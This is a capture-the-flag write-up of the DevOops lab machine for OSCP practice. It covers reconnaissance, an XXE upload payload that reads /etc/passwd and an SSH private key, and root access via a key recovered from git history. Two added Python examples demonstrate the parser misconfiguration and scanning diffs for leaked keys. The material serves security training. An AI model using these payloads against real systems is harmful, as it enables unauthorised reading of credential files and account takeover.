DevOops is our seventh machine in the OSCP list provided by NetSec Focus! This machine was something new to me because of its XXE vulnerability and its privilege escalation using certain git commands. There were many ways to do it, and scripts in different languages could have been a good tool, but this time I decided to use Burp Suite as the must-use tool. This is the seventh blog before my third attempt at the OSCP exam, so let's get to it!
So, we start with an nmap scan to check which ports are open and which services are running on this machine.
nmap -sC -sV -p- -oN scan.nmap 10.10.10.91
So, we see that port 5000 is running an HTTP service, which means we can visit it with our browser and check what we can find!
Ok, it seems that it is still under construction. Some directory brute force doesn't seem a bad idea.
Directory Brute Force
Running dirsearch, we get some results!
./dirsearch.py -u http://10.10.10.91:5000 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -f -e txt
Great! Looks like we have some good chances, so going to /feed there is nothing beyond what is shown on the index page, but the interesting part comes when we see
XXE Vulnerability Execution
As the name says, we can upload a new file, either txt or XML, but look at the elements it asks for, which are Author, Subject, and Content. This is the actual file we used to test the upload feature; check that it has the elements the website is asking for.
<payload> <Author>Coffee</Author> <Subject>Junkie</Subject> <Content>Devoops</Content> </payload>
Then, once we upload the file with the name test.xml, we have successful results!
So, looking at the OWASP page that talks about XXE, there is a good chance to achieve RCE (Remote Code Execution), which this machine is not vulnerable to, but we can achieve some kind of file reading on this machine! This is the code in order to achieve the file read.
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <payload> <Author>&xxe;</Author> <Subject>Coffee</Subject> <Content>Junkiee</Content> </payload>
So, note that where it says <Author>&xxe;</Author> we are referencing the external entity, which the parser expands with the file contents when it processes the upload, and with the help of Burp Suite and its Repeater feature we can see a successful file read.
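To show exactly where the weakness lives, here is an added example (my own code, not the box's feed application and not from the original post) that parses the same upload format twice with Python's xml.sax: once with external general entities enabled, which is the misconfiguration the upload feature exhibits, and once with them disabled, which is the fix. The "secret" it reads is a temporary file containing one constructed passwd-style line, so nothing on the real system is touched; the FeedHandler class, the temporary path and the constructed line are all assumptions of the example.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for a /etc/passwd line; the demo never reads a real system file.
# (No trailing newline: keeps the external entity a single run of character data.)
SECRET_LINE = "roosa:x:1000:1000:,,,:/home/roosa:/bin/bash"


class FeedHandler(ContentHandler):
    """Collects the text of each element, the way a naive feed parser would."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        self._current = name
        self.fields.setdefault(name, "")

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def build_feed(system_id):
    """The upload format from the page, with Author pointing at an external entity."""
    return (
        "<!DOCTYPE foo [ <!ELEMENT foo ANY > "
        f'<!ENTITY xxe SYSTEM "{system_id}">]>'
        "<payload><Author>&xxe;</Author><Subject>Coffee</Subject>"
        "<Content>Junkiee</Content></payload>"
    ).encode()


def parse_feed(xml_bytes, resolve_external_entities):
    """Parse with xml.sax; the flag decides whether SYSTEM entities are fetched."""
    handler = FeedHandler()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    # Hardened setting is feature_external_ges=False (the stdlib default since 3.7.1);
    # an application that turns it on, or an old interpreter, resolves file:// entities.
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return {k: v for k, v in handler.fields.items() if k != "payload"}


def demo():
    """Run the same upload through the vulnerable and the hardened configuration."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(SECRET_LINE)
        secret_path = fh.name
    try:
        feed = build_feed("file://" + secret_path)
        return {
            "vulnerable": parse_feed(feed, resolve_external_entities=True),
            "hardened": parse_feed(feed, resolve_external_entities=False),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    for mode, fields in demo().items():
        print(f"{mode}: Author={fields['Author']!r}")
```

With entities enabled the Author field comes back holding the file contents, which is what Repeater showed on the box; with them disabled the reference is simply dropped and Author is empty while Subject and Content are untouched. The same split exists in other parsers (lxml's resolve_entities, Java's DocumentBuilderFactory features), so the defensive check is always "does this parser fetch SYSTEM entities for untrusted input?".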
What we see in the image above is the user roosa, which might come with some capabilities as well, things like reading the user flag!
Getting User Flag
So, knowing that we can obtain the user flag, we can actually read it from Repeater in Burp just by requesting the flag file through the HTTP request!
Cool, we got it! But it's better to obtain a reverse shell in order to complete this challenge as Odin rules.
Getting Reverse Shell
So, thinking about what other files we could read, the idea came up to check whether there was some kind of RSA key in roosa's directory, and indeed there was! Going to /home/roosa/.ssh/id_rsa there was the SSH private key, which means we can log in with SSH.
So, let's copy the key to our localhost and give it the right permissions to connect to DevOops as the user roosa.
So, here we are with a proper shell and our flag! Voilà.
The privilege escalation was tricky here. I tried to exploit some SUIDs with no success, and after listing a couple of files in /home/roosa/work/blogfeed there was this interesting directory called .git, which gave me the suspicion of finding something.
So, reading and looking around more blogs about this machine, I didn't know that you can check the logs with a git command, and this actually helped to see that in this folder somebody had been changing an authorization key! This is the git command.
git log --name-only --oneline
So here is a way to compare these commits with a git command and see what information was replaced!
git diff 33e87c3 d387abf
Great! It seems that somebody was changing the key. From here I tried both keys, and the one that gave a good result was the one highlighted in green, which means it was the replacement for the old one. So let's save the key and give it permissions to log in as root. Remember to do this as roosa, because roosa has the privilege to log in through SSH as root, which we as localhost don't have.
And let's log in and get the root flag!
So, after saving the key and giving it permissions, we could log in and get the flag! Challenge done!
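The git history is what gave both the old and the new key away, so the defensive counterpart to this step is a check that flags private-key material in a diff, whether in a pre-commit hook or when reviewing history with git diff. The following added example (my own code, not part of the original post and not from the box) parses unified diff output, the format git diff prints, and reports every added, removed or context line carrying a PEM private-key header together with the file and line number. The sample diff, the file name deploy_key, feed.py and the key bodies are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Header of any PEM-encoded private key (RSA, OPENSSH, EC, DSA, PKCS#8 ...).
PEM_PRIVATE_KEY = re.compile(r"-----BEGIN [A-Z0-9 ]*PRIVATE KEY-----")
HUNK_HEADER = re.compile(r"^@@ -(\d+)(?:,\d+)? \+(\d+)(?:,\d+)? @@")


@dataclass
class Finding:
    path: str
    kind: str   # "added", "removed" or "context"
    line: int   # line number in the new file, or in the old file for removed lines
    text: str


def scan_diff_for_private_keys(diff_text):
    """Walk a unified diff (git diff / git show style) and report key headers."""
    findings = []
    path = None
    in_hunk = False
    old_line = new_line = 0
    for raw in diff_text.splitlines():
        if raw.startswith("diff --git "):
            in_hunk = False          # a new file section starts
            continue
        hunk = HUNK_HEADER.match(raw)
        if hunk:
            old_line, new_line = int(hunk.group(1)), int(hunk.group(2))
            in_hunk = True
            continue
        if not in_hunk:
            if raw.startswith("+++ "):
                path = raw[4:]
                path = path[2:] if path.startswith("b/") else path
            continue                 # index/---/+++ lines carry no content
        if raw.startswith("\\"):
            continue                 # "\ No newline at end of file"
        # Inside a hunk only the first character is the diff marker; a removed PEM
        # header therefore shows up as "------BEGIN ...", which must not be mistaken
        # for a "---" file header.
        marker, text = raw[:1], raw[1:]
        if marker == "+":
            kind, line = "added", new_line
            new_line += 1
        elif marker == "-":
            kind, line = "removed", old_line
            old_line += 1
        else:
            kind, line = "context", new_line
            old_line += 1
            new_line += 1
        if PEM_PRIVATE_KEY.search(text):
            findings.append(Finding(path, kind, line, text.strip()))
    return findings


# Constructed sample: a key file whose contents were swapped, plus an unrelated change.
SAMPLE_DIFF = """\
diff --git a/deploy_key b/deploy_key
index 1111111..2222222 100644
--- a/deploy_key
+++ b/deploy_key
@@ -1,3 +1,3 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEowIBAAKCAQEAoldkeyPLACEHOLDERoldkeyPLACEHOLDER
------END RSA PRIVATE KEY-----
+-----BEGIN RSA PRIVATE KEY-----
+MIIEowIBAAKCAQEAnewkeyPLACEHOLDERnewkeyPLACEHOLDER
+-----END RSA PRIVATE KEY-----
diff --git a/feed.py b/feed.py
index 3333333..4444444 100644
--- a/feed.py
+++ b/feed.py
@@ -1,2 +1,2 @@
-KEY_PATH = "deploy_key.old"
+KEY_PATH = "deploy_key"
 print(KEY_PATH)
"""


if __name__ == "__main__":
    for f in scan_diff_for_private_keys(SAMPLE_DIFF):
        print(f"{f.path}:{f.line} [{f.kind}] {f.text}")
```

Both the removed and the added header are reported, which is the point of this box: replacing a key in a later commit does not remove the old one from history, and whoever can read the repository can read every version. In practice the scanner is fed the output of git diff or git show for the commits being reviewed; the parser assumes git's "diff --git" section headers, so plain diff -u output with several files would need the file-header handling adjusted.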
Learning that there is something beyond remote code execution, and how useful the ability to read remote files can be, is very good! Also, I didn't have any knowledge about XXE, so this machine was eye-opening. The privilege escalation was also curious because of the git commands and the ability to read old contributions and changes. Definitely a great box!